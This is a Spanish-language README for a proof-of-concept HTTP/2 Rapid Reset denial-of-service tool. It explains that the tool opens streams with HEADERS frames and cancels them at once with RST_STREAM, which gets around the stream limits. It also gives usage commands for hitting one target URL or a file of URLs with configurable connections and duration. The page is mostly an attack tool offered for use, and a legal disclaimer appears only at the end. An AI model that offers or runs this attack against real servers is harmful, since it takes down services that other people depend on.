
PoC para el ataque DoS por RST descubierto en 2023
por 7pirqte
poc para el ataque de reinicio rápido http/2. básicamente abres un stream con un frame HEADERS y luego envías inmediatamente RST_STREAM para cancelarlo. el servidor hace todo el trabajo de configurar y desmontar streams mientras tú solo spammea solicitudes. los streams cancelados no cuentan para el límite máximo de streams, así que básicamente puedes enviar reinicios ilimitados.
esto se usó en algunos ataques ddos masivos en 2023
pip install -r requirements.txt
# objetivo único
python main.py -u https://target.com
# desde archivo
python main.py -f urls.txt
# 10 conexiones durante 30 segundos
python main.py -u https://target.com -c 10 -d 30
-u - url objetivo-f - archivo con urls (una por línea)-c - conexiones por objetivo (por defecto 1)-d - duración en segundos (por defecto 10)--delay - retraso entre reiniciosusa esto solo en sistemas que poseas o para los que tengas permiso de prueba. no seas estúpido, las pruebas no autorizadas son ilegales y poco éticas, úsalo responsablemente y cumple con todas las leyes y regulaciones aplicables.